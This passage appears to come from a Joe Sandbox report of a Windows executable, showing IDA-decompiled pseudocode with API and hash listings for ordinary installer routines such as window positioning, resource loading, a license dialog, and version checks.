                                                                                                                                                                                                                                            				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                            				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                            				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                            				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                            				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                            				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                            				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                            				_t56 = _v48;
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                            				_t67 = 0;
                                                                                                                                                                                                                                            				if(_t72 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v52;
                                                                                                                                                                                                                                            					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                            						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t72 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                            				if(_t59 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v60;
                                                                                                                                                                                                                                            					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                            						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t59 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00A043F1
                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00A0440B
                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 00A04423
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00A0442E
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00A0443A
                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00A04447
                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00A044A2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2212493051-0
                                                                                                                                                                                                                                            • Opcode ID: 3110ab412b17da08783f428acd621803750051f139d0944a475c24b96ab5a129
                                                                                                                                                                                                                                            • Instruction ID: fcd66c817c3c5757e06f11c6d5800d7ea7a09cc8b46ffc436338dec36f3cd324
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3110ab412b17da08783f428acd621803750051f139d0944a475c24b96ab5a129
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65311071E0021DAFCB14CFF8DD899EEBBB5FB89310F154169E905B3250D6716D068B50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                            			E00A06298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				struct HRSRC__* _t21;
                                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				intOrPtr* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                            				_t46 = 0;
                                                                                                                                                                                                                                            				_v32 = __ecx;
                                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                                            				_t36 = 1;
                                                                                                                                                                                                                                            				E00A0171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                            					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                            					if(_t45 == 0) {
                                                                                                                                                                                                                                            						 *0xa09124 = 0x80070714;
                                                                                                                                                                                                                                            						_t36 = _t46;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                            						_t44 = _t5;
                                                                                                                                                                                                                                            						_t40 = _t44;
                                                                                                                                                                                                                                            						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                            						_t47 = _t6;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t26 =  *_t40;
                                                                                                                                                                                                                                            							_t40 = _t40 + 1;
                                                                                                                                                                                                                                            						} while (_t26 != 0);
                                                                                                                                                                                                                                            						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                            						_t46 = _t51;
                                                                                                                                                                                                                                            						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                            						 *0xa0a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                            						_t30 = _v32();
                                                                                                                                                                                                                                            						if(_t51 != _t51) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(_t45);
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							_t36 = 0;
                                                                                                                                                                                                                                            							FreeResource(??);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							FreeResource();
                                                                                                                                                                                                                                            							_v36 = _v36 + 1;
                                                                                                                                                                                                                                            							E00A0171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                            							_t46 = 0;
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					return E00A06CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A0171E: _vsnprintf.MSVCRT ref: 00A01750
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00A051CA,00000004,00000024,00A02F71,?,00000002,00000000), ref: 00A062CD
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A051CA,00000004,00000024,00A02F71,?,00000002,00000000), ref: 00A062D4
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A051CA,00000004,00000024,00A02F71,?,00000002,00000000), ref: 00A0631B
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00A06345
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A051CA,00000004,00000024,00A02F71,?,00000002,00000000), ref: 00A06357
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                            • String ID: UPDFILE%lu
                                                                                                                                                                                                                                            • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                            • Opcode ID: 6636903362ac23a8161b55e853a9a2674574e7e917699ef7a5e9772880c97852
                                                                                                                                                                                                                                            • Instruction ID: fa0a2b252caad41910be2daa06d0bee3ad7e666d569959a4253dc60512a1c550
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6636903362ac23a8161b55e853a9a2674574e7e917699ef7a5e9772880c97852
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3121D675A0021DABDB10DFA4AC459FFBB78FB48714B004219F902A7281DB759D178BE1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A0681F(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                            				void* _v172;
                                                                                                                                                                                                                                            				int* _v176;
                                                                                                                                                                                                                                            				int _v180;
                                                                                                                                                                                                                                            				int _v184;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t31;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t36 = __ebx;
                                                                                                                                                                                                                                            				_t19 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                            				_t41 =  *0xa081d8; // 0x0
                                                                                                                                                                                                                                            				_t43 = 0;
                                                                                                                                                                                                                                            				_v180 = 0xc;
                                                                                                                                                                                                                                            				_v176 = 0;
                                                                                                                                                                                                                                            				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                            					 *0xa081d8 = 0;
                                                                                                                                                                                                                                            					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            						_t41 =  *0xa081d8; // 0x0
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t41 = 1;
                                                                                                                                                                                                                                            						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t31 = RegQueryValueExA(_v172, 0xa01140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                            							_t43 = _t31;
                                                                                                                                                                                                                                            							RegCloseKey(_v172);
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								goto L12;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t40 =  &_v176;
                                                                                                                                                                                                                                            								if(E00A066F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                            									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                            										 *0xa081d8 = _t41;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L12;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A0686E
                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004A), ref: 00A068A7
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A068CC
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00A01140,00000000,?,?,0000000C), ref: 00A068F4
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00A06902
                                                                                                                                                                                                                                              • Part of subcall function 00A066F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00A0691A), ref: 00A06741
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Control Panel\Desktop\ResourceLocale, xrefs: 00A068C2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                            • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                            • Opcode ID: 18a85d9700ef4110b3d5b312069fa6b8a3142055c0db4cf2c0a7362d67be1f7d
                                                                                                                                                                                                                                            • Instruction ID: 07e8aaf4ec8fef67002b08475691e3ce02d045c238a4400ae43cedc03aa0993d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18a85d9700ef4110b3d5b312069fa6b8a3142055c0db4cf2c0a7362d67be1f7d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93316431A0032C9FDB21CF51EC45BAA7778FF55758F0001A5E989A6280DB709E97CF52
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A03A3F(void* __eflags) {
                                                                                                                                                                                                                                            				void* _t3;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = "LICENSE";
                                                                                                                                                                                                                                            				_t1 = E00A0468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				 *0xa08d4c = _t3;
                                                                                                                                                                                                                                            				if(_t3 != 0) {
                                                                                                                                                                                                                                            					_t19 = _t16;
                                                                                                                                                                                                                                            					if(E00A0468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA( *0xa08d4c, "<None>") == 0) {
                                                                                                                                                                                                                                            							LocalFree( *0xa08d4c);
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0xa09124 = 0;
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t9 = E00A06517(_t19, 0x7d1, 0, E00A03100, 0, 0);
                                                                                                                                                                                                                                            						LocalFree( *0xa08d4c);
                                                                                                                                                                                                                                            						if(_t9 != 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa09124 = 0x800704c7;
                                                                                                                                                                                                                                            						L2:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E00A044B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree( *0xa08d4c);
                                                                                                                                                                                                                                            					 *0xa09124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L2;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A044B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046A0
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: SizeofResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046A9
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046C3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LoadResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046CC
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LockResource.KERNEL32(00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046D3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: memcpy_s.MSVCRT ref: 00A046E5
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A02F64,?,00000002,00000000), ref: 00A03A5D
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00A03AB3
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A04518
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A04554
                                                                                                                                                                                                                                              • Part of subcall function 00A06285: GetLastError.KERNEL32(00A05BBC), ref: 00A06285
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(<None>,00000000), ref: 00A03AD0
                                                                                                                                                                                                                                            • LocalFree.KERNEL32 ref: 00A03B13
                                                                                                                                                                                                                                              • Part of subcall function 00A06517: FindResourceA.KERNEL32(00A00000,000007D6,00000005), ref: 00A0652A
                                                                                                                                                                                                                                              • Part of subcall function 00A06517: LoadResource.KERNEL32(00A00000,00000000,?,?,00A02EE8,00000000,00A019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A06538
                                                                                                                                                                                                                                              • Part of subcall function 00A06517: DialogBoxIndirectParamA.USER32(00A00000,00000000,00000547,00A019E0,00000000), ref: 00A06557
                                                                                                                                                                                                                                              • Part of subcall function 00A06517: FreeResource.KERNEL32(00000000,?,?,00A02EE8,00000000,00A019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A06560
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00A03100,00000000,00000000), ref: 00A03AF4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$LICENSE
                                                                                                                                                                                                                                            • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                            • Opcode ID: 59a6f6d062fdb84cd4f54c2ea60fa54d37af1fb1e5fd38398ff174307e4f29fb
                                                                                                                                                                                                                                            • Instruction ID: 86138068a2e46c4371d3164328364c17c36b3b43a47b7e75d478416ab8274156
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59a6f6d062fdb84cd4f54c2ea60fa54d37af1fb1e5fd38398ff174307e4f29fb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79119A7170120DABDB20DFB2BD09E1739BDEBD9B40B10462EB645D51F1DBBE88138664
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A024E0(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t7;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				long _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = __ebx;
                                                                                                                                                                                                                                            				_t7 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                            				_t25 = 0x104;
                                                                                                                                                                                                                                            				_t26 = 0;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					E00A0658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                            					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                            					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                            					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                            						_lclose(_t25);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00A02506
                                                                                                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00A0252C
                                                                                                                                                                                                                                            • _lopen.KERNEL32 ref: 00A0253B
                                                                                                                                                                                                                                            • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00A0254C
                                                                                                                                                                                                                                            • _lclose.KERNEL32(00000000), ref: 00A02555
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                            • String ID: wininit.ini
                                                                                                                                                                                                                                            • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                            • Opcode ID: 0cffc04c56e936b306684f15829f59a316d5063054dfa580228e8d53b2569b1a
                                                                                                                                                                                                                                            • Instruction ID: d79ab5d5c74a27b69755410f0bc68a795eb2e35e3be0eb18f7e595fcf73acc8e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cffc04c56e936b306684f15829f59a316d5063054dfa580228e8d53b2569b1a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54019E32A0022C6BD720DFA5AC0CEDBBB7CEB95760F000165FA49D3190DA749E478AA5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E00A036EE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                            				signed int _v420;
                                                                                                                                                                                                                                            				signed int _v424;
                                                                                                                                                                                                                                            				CHAR* _v428;
                                                                                                                                                                                                                                            				CHAR* _v432;
                                                                                                                                                                                                                                            				signed int _v436;
                                                                                                                                                                                                                                            				CHAR* _v440;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                                                                                            				CHAR* _t77;
                                                                                                                                                                                                                                            				CHAR* _t91;
                                                                                                                                                                                                                                            				CHAR* _t94;
                                                                                                                                                                                                                                            				int _t97;
                                                                                                                                                                                                                                            				CHAR* _t98;
                                                                                                                                                                                                                                            				signed char _t99;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				signed short _t107;
                                                                                                                                                                                                                                            				signed int _t109;
                                                                                                                                                                                                                                            				short _t113;
                                                                                                                                                                                                                                            				void* _t114;
                                                                                                                                                                                                                                            				signed char _t115;
                                                                                                                                                                                                                                            				short _t119;
                                                                                                                                                                                                                                            				CHAR* _t123;
                                                                                                                                                                                                                                            				CHAR* _t124;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				signed int _t131;
                                                                                                                                                                                                                                            				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

